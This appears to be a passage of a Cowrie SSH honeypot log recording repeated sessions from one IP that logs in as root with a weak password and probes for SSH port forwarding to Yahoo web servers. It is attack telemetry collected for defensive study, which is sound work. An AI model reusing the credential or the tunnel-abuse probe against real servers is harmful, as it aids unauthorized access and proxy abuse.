s192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.539891Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.775045Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21250,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21250","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.823169Z","session":"aa61387dbc81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.870559Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16384,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16384","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.005760Z","session":"aa61387dbc81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.053110Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.101035Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19002,"dst_ip":"1.2.3.4","dst_port":22,"session":"13353e351173","protocol":"ssh","message":"New connection: 213.209.150.239:19002 (1.2.3.4:22) [session: 13353e351173]","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.147252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.148345Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.195938Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.430556Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5926,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5926","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.478819Z","session":"13353e351173"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.526166Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":24593,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24593","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.661602Z","session":"13353e351173"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.708732Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.757112Z","src_ip":"213.209.150.239","session":"13353e351173"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19054,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3a997add362","protocol":"ssh","message":"New connection: 213.209.150.239:19054 (1.2.3.4:22) [session: b3a997add362]","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.803277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.803988Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:35.851350Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.086342Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":13801,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13801","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.134743Z","session":"b3a997add362"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.181835Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14715,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14715","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.317378Z","session":"b3a997add362"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.364691Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.412604Z","src_ip":"213.209.150.239","session":"b3a997add362"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19099,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ddb92367a5","protocol":"ssh","message":"New connection: 213.209.150.239:19099 (1.2.3.4:22) [session: 61ddb92367a5]","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.458872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.469343Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.506472Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.741864Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":16619,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16619","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.791335Z","session":"61ddb92367a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.838937Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":6677,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6677","sensor":"my-vps","timestamp":"2025-08-26T01:01:36.981686Z","session":"61ddb92367a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.028991Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.077036Z","src_ip":"213.209.150.239","session":"61ddb92367a5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19140,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f36fdfd9c7f","protocol":"ssh","message":"New connection: 213.209.150.239:19140 (1.2.3.4:22) [session: 6f36fdfd9c7f]","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.123645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.124291Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.172087Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.407499Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":7382,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7382","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.455735Z","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.503122Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29915,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29915","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.637609Z","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.685061Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.733160Z","src_ip":"213.209.150.239","session":"6f36fdfd9c7f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19189,"dst_ip":"1.2.3.4","dst_port":22,"session":"3828aef82f9f","protocol":"ssh","message":"New connection: 213.209.150.239:19189 (1.2.3.4:22) [session: 3828aef82f9f]","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.779286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.780535Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:37.827560Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.063097Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1702,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1702","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.111114Z","session":"3828aef82f9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.158432Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":12771,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12771","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.293789Z","session":"3828aef82f9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.341180Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.389819Z","src_ip":"213.209.150.239","session":"3828aef82f9f"}
